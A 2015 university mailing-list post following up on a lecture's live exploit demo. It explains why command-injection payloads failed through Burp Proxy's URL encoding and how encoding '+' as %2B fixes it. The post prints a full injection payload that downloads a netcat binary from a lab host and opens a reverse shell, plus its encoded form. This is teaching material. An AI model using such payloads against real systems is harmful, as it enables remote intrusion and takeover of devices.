[oss] Radu Caragea presenting a practical exploit at today's lecture
Radu Caragea
sinaelgl at gmail.com
Tue Jan 13 22:09:08 EET 2015
On Mon, Jan 12, 2015 at 12:39 PM, Razvan Deaconescu <
razvan.deaconescu at cs.pub.ro> wrote:
> Hi.
>
> At today's lecture, at the beginning of the second hour (7pm), Radu
> Caragea will show us a practical exploit: dicovering the vulnerability
> and the practic steps in exploiting it.
Hello, as promised, I looked into why some of the payloads weren't working,
they all had the same problem.
An example of one which didn't work is the following:
; cd /tmp; wget 192.168.1.2/nc_static_mips; chmod +x nc_static_mips;
./nc_static_mips -e /bin/sh 192.168.1.2 12345;
After entering it into Burp Proxy to modify the request it gets encoded
into:
;%20cd%20/tmp;%20wget%20192.168.1.2/nc_static_mips;%20chmod%20+x%20nc_static_mips;%20./nc_static_mips%20-e%20/bin/sh%20192.168.1.2%2012345;
However, as pointed out at [1] "URL encoding normally replaces a space with
a plus (+) sign or with %20.". The reverse also applies.
So the problematic part is actually:
;%20chmod%20+x%20nc_static_mips;
Which upon decoding by the web server will turn into:
; chmod x nc_static_mips;
So the problem lies in Burp's assumptions about what I entered into that
field. A quick fix is to use python's urllib which is more cautious and
even encodes ";"
>>> urllib.quote("; chmod +x nc_static_mips;")
'%3B%20chmod%20%2Bx%20nc_static_mips%3B'
It is sufficient to replace "+" with "%2B" in the initial payload for
everything to work as expected.
[1] http://www.w3schools.com/tags/ref_urlencode.asp
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://cursuri.cs.pub.ro/pipermail/oss/attachments/20150113/75dec26b/attachment.html>
More information about the oss
mailing list